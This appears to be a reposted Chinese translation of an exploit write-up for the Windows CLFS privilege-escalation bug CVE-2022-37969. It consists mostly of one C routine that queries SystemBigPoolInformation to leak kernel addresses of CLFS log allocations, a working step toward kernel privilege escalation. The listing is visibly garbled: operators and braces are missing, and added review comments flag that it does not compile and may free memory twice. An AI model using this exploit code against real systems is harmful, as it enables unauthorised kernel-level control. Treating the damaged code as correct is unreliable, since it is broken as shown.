[翻译]windows clfs 提权漏洞 cve-2022-37969

// systembigpoolinformation

 

/*
 * getbigpoolinfo - walk the kernel's big-pool allocation list and record the
 * addresses of the CLFS base-log-file allocations it finds.
 *
 * Calls NtQuerySystemInformation(SystemBigPoolInformation) twice: a probe with
 * a 0x1000-byte buffer that is expected to fail with STATUS_INFO_LENGTH_MISMATCH
 * (0xC0000004) and hand back the required length in retlen, then a second call
 * with a buffer of that length.  The returned entries are walked backwards from
 * the last one; every entry whose size field is 0x7a00 and whose tag bytes match
 * the file-scope `tag` string has its (flag-bit-masked) address appended to the
 * global `kerneladdrarray`, unless that address is already recorded there.
 *
 * Parameters:
 *   _a2 - optional out pointer; when non-NULL it receives the address of the
 *         last matching entry.  Left untouched if nothing matched.
 * Returns: always 0, so a caller cannot distinguish a failed query or a failed
 *          allocation from "no matching entry".
 * Globals used but declared outside this listing: flag2, kerneladdrarray,
 *   p_num_of_clfs, tag, fnntquerysysteminformation.
 *
 * NOTE(review): this listing is extraction-damaged and does not compile as
 * shown.  The `+`/`++` operators were stripped (`v7;`, `v14;`, `v15;`,
 * `v12 ]`, `v10 v12 15`, `4 * v6 - 4 2 * v6`), the function's opening and
 * closing braces and the closing `)` of the 0x7a00 test are missing, v9 and
 * v10 have no visible declaration, and the condition in front of the
 * "error allocating memory" block is gone (presumably a NULL check on v5).
 * The per-line comments describe the evident intent, not verified behaviour.
 */
int getbigpoolinfo(puint64 _a2)

    uint64 v7 = 0; // entry counter for the backwards walk (compared with v6)

    uint v8 = 0; // counter: number of matches written through _a2

    uint64 v11 = 0; // address of the current entry, low flag bit cleared

    ulong retlen = 0; // length required/returned by the query

    puint64 v15 = 0; // cursor into kerneladdrarray for the duplicate check

    ulong v4 = 0; // size of the second (full-size) buffer

    dword* v5; // second buffer, sized from retlen

    uint v6 = 0; // entry count read from the start of the buffer

 

    // MEM_COMMIT (0x1000), PAGE_READWRITE (4).  Result is not checked for NULL.
    dword* v3 = (dword*)virtualalloc(0, 0x1000, 0x1000, 4);

    // Probe call: 0x1000 bytes is expected to be too small; on
    // STATUS_INFO_LENGTH_MISMATCH retlen holds the size actually needed.
    if (fnntquerysysteminformation(systembigpoolinformation, v3, 0x1000, &retlen) == 0xc0000004)

    {

        // Loop body runs at most once; every path ends in break or goto.
        while (1)

        {

            // MEM_RELEASE (0x8000) the probe buffer.
            // NOTE(review): v3 is released here, yet label_4 below still reads
            // `*v3` (field count and entry walk) and frees v3 again — either an
            // assignment `v3 = v5` was lost in extraction, or as written this
            // path reads freed memory and double-frees on this branch.
            virtualfree(v3, 0, 0x8000);

            v4 = retlen;

            v5 = (dword*)virtualalloc(0, (size_t)retlen, 0x1000, 4);

            // NOTE(review): the controlling condition of this block is missing
            // from the listing; it presumably tested v5 for NULL.
            {

                printf("[ ] error allocating memory\n");

                break;

            }

// fnntquerysysteminformation has to be called twice: the first call fails but
// reports the buffer size the second call needs in order to obtain the data.

            // Any status other than "buffer too small" is treated as success;
            // a genuine failure status (e.g. access denied) is not distinguished.
            if (fnntquerysysteminformation(systembigpoolinformation, v5, v4, &retlen) != 0xc0000004)

            {//v5 = system_big_pool_information

                goto label_4; // jumps into the else-branch below (legal C, but hard to follow)

            }

            else {

                break; // still too small: give up silently (return 0)

            }

 

        }

        //printf("[ ] error allocating memory\n");

    }

    else {

    label_4:

        v6 = (uint) * (puint)v3; // v6 is the field count on the system_bigpool_information

        //  printf("[ ] field count --> %x\n", v6);

 

        // First-time allocation of the address array, gated by the global flag2.
        // NOTE(review): malloc result is not checked before memset (NULL
        // dereference on failure); `v6 * 8` is uint arithmetic and wraps for
        // very large counts; flag2 is not set here, so whether this runs once
        // or allocates (and leaks) on every call depends on code outside the
        // listing.  The printf has no trailing newline.
        if (flag2 == 0) {

            kerneladdrarray = (puint64)malloc(v6 * 8);

            printf("kernel addresss array %p", kerneladdrarray);

            memset(kerneladdrarray, 0, (v6 * 8));

        }

 

        if (v6)

        {

            v9 = *p_num_of_clfs; // number of addresses already in kerneladdrarray (v9 undeclared in the listing)

            // Point at the last entry; the index expression lost an operator in
            // extraction and cannot be reconstructed with certainty here.
            v10 = (puint64)&v3[4 * v6 - 4 2 * v6];

            //      printf("[ ] last system big pool entry offset --> %p\n", v10); // offset to the last system_bigpool_entry

 

            do {

                // The first qword of an entry carries a flag in its low bit;
                // strip it to get the allocation address.
                v11 = *v10 & 0xfffffffffffffffe;

                //  printf("[ ] first field value of big pool entry structure, named virtual address --> %p\n", v11);

                if ((*v10 & 1) == 0)

                {

                    v11 = *v10; // no flag bit set: value is already the address

                }

                if (v10[1] == 0x7a00// search for the clfs base log file size

                {

                    uint v12 = 0; // index into `tag`; `tag[v12 ]` lost its `++`

                    // Compare the entry's tag bytes against `tag` one byte at a
                    // time; `v10 v12 15` lost its `+` operators in extraction.
                    while (1)

                    {

                        char v13 = tag[v12 ];

                        if (v13 != *((byte*)v10 v12 15))

                        {

                            break; // mismatch: not a CLFS entry

                        }

 

                        if (v12 == 5) // tag clfs found !

                        {

                            uint v14 = 0; // index for the duplicate scan below

 

                            // Nothing recorded yet: append directly.
                            if (v9 <= 0)

                            {

                            label_16:

                                uint v16 = v9 ; // slot to fill; `v9 ;` presumably lost a `++`

                                kerneladdrarray[v16] = v11;

 

 

                                if (_a2)

                                {

                                     v8; // match counter; lost its `++`

                                    *_a2 = v11;

                                }

// _a2 always ends up pointing at the last valid pool allocation created with
// the clfs tag and a size of 0x7a00.

                            }

                            else

                            {

                                // Scan the recorded addresses; if v11 is not
                                // among the first v9 entries, fall into label_16
                                // to append it.  `v14;` / `v15;` lost their `++`.
                                v15 = kerneladdrarray;

                                while (*v15 != v11)

                                {

                                     v14;

                                     v15;

                                    if (v14 >= v9) {

                                        goto label_16;

                                    }

                                }

                            }

                            break;

                        }

 

                    }

                }

 

 

                 v7; // entry counter; lost its `++`

                v10 -= 3; // back 0x18 to previous system big pool entry to find the 0x7a00

            } while (v7 < v6); // it compares the counter against the field count of system_bigpool_information

 

            *p_num_of_clfs = v9; // persist the updated address count for later calls

        }

        //printf("[ ] variables: v8 = %x   v9 = %x\n", v8, v9);

        //printf("[ ] kernel addresses array --> %p\n", kerneladdrarray);

        if (_a2 && v8 == 0) {

            printf("[ ] not found available chunk\n"); // reported only; return value is still 0

        }

        // Release the query buffer (see the note at the first virtualfree about
        // which buffer is actually live on the loop path).
        virtualfree(v3, 0, 0x8000);

    }

    return 0; // unconditional; failures above are not reported to the caller

原文链接:https://bbs.kanxue.com/thread-277554.htm

网络摘文,本文作者:15h,如若转载,请注明出处:https://www.15cov.cn/2023/08/27/翻译windows-clfs-提权漏洞-cve-2022-37969-漏洞利用/
